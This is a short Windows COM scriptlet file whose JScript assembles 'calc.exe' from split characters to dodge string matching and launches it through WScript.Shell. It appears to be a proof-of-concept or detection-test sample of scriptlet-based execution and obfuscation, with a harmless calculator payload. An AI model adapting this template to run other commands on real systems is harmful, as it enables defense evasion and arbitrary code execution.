<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="SimpleObfuscation"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
	<script language="JScript">
		<![CDATA[
			// Simple string splitting and reconstruction for command execution
			var part1 = 'c';
			var part2 = 'a';
			var part3 = 'l';
			var part4 = 'c';
			var part5 = '.';
			var part6 = 'e';
			var part7 = 'x';
			var part8 = 'e';
			
			// Concatenate the parts to form the command
			var command = part1 + part2 + part3 + part4 + part5 + part6 + part7 + part8;
			
			// Dynamically get the WScript.Shell object
			var shell = new ActiveXObject("WScript.Shell");
			
			// Execute the command
			shell.Run(command);
		]]>
	</script>
</registration>
</scriptlet>
